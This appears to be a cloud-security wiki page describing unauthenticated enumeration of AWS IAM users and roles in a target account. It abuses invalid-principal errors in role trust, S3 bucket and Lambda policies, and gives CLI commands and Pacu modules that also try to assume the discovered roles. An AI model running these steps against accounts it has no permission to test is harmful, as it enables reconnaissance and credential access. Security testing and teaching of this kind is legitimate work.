Enumerate (Unauthenticated) IAM Users and Roles
Exploiting an AWS feature of the IAM Role Trust Policy allowing for unauthenticated enumeration of AWS IAM Users and Roles in AWS Accounts.
We need to know the AWS Account ID for this technique to work. Refer to Enumerate AWS Account IDs for methods on how to obtain this.
Unauthenticated Enumeration of IAM Users and Roles
Essentially, when updating an IAM Role's Trust Policy, AWS will either allow it or return an error
The error is returned if the ARN of the identity does not exist
Leveraging AWS Console
First, create an IAM Role and then update its Trust Policy
Principals can be specified in an IAM Role's policy and will provide an error if the principal is invalid
Leveraging AWS CLI
Principals can be specified in an IAM Role's policy and will provide an error if the principal is invalid
Create an IAM Role Policy with a valid principal
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::111111111111:user/valid-user"
},
"Action": "sts:AssumeRole"
}
]
}Create the IAM Role
aws iam create-role --role-name myRole --assume-role-policy-document file://roletrustpolicy.jsonUpdate Policy with user/role to test
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::111111111111:user/bob"
},
"Action": "sts:AssumeRole"
}
]
}Update the Role with the new Policy
aws --profile lab iam update-assume-role-policy --role-name <MyRoleName> --policy-document file://roletrustpolicy.json
An error occurred (MalformedPolicyDocument) when calling the UpdateAssumeRolePolicy operation: Invalid principal in policy: "AWS":"arn:aws:iam::111111111111:user/bob"Leveraging Pacu
Pacu provides modules that automatically attempt to enumerate valid IAM Users and Roles in an AWS account using this method
Pacu will also attempt to assume the role which will provide credentials for the role
Default wordlists are used unless you specify your own
run iam__enum_users --role-name <MyRoleName> --account-id 111111111111run iam__enum_roles --role-name <MyRoleName> --account-id 111111111111run iam__enum_users --role-name <MyRoleName> --account-id 111111111111 --word-list <myUser/RoleList>Leveraging S3
Principals can be specified in an S3 Bucket's policy and will provide an error if the principal is invalid
aws s3api create-bucket --bucket <bucketName> {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::<targetAccountId>:user/bob"
},
"Action": "s3:ListBucket",
"Resource": "arn:aws:s3:::<bucketName>"
}
]
}aws s3api put-bucket-policy --bucket <bucketName> --policy file://s3bucketpolicy.json
An error occurred (MalformedPolicy) when calling the PutBucketPolicy operation: Invalid principal in policyLeveraging Lambda
Principals can be specified in a Lambda Function's resource policy and will provide an error if the principal is invalid
Create Trust Policy for IAM Role
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "lambda.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
}Create IAM Role
aws iam create-role --role-name lambda-role --assume-role-policy-document file://lambdapolicy.json Create Function Code
def lambda_handler(event, context):
print(event)
return 'Hello from Lambda!'Zip the Function Code
zip functioncode.zip functioncode.pyCreate the Function
aws lambda create-function --function-name tylertestiamprincipals --runtime python3.9 --zip-file fileb://functioncode.zip --handler hello.lambda-handler --role arn:aws:iam::111111111111:role/lambda-roleaws lambda add-permission --function-name tylertestiamprincipals --action lambda:ListFunctions --statement-id tylertestiamprincipals2 --principal "arn:aws:iam::111111111111:role/sally"
An error occurred (InvalidParameterValueException) when calling the AddPermission operation: The provided principal was invalid. Please check the principal and try again.Last updated
Was this helpful?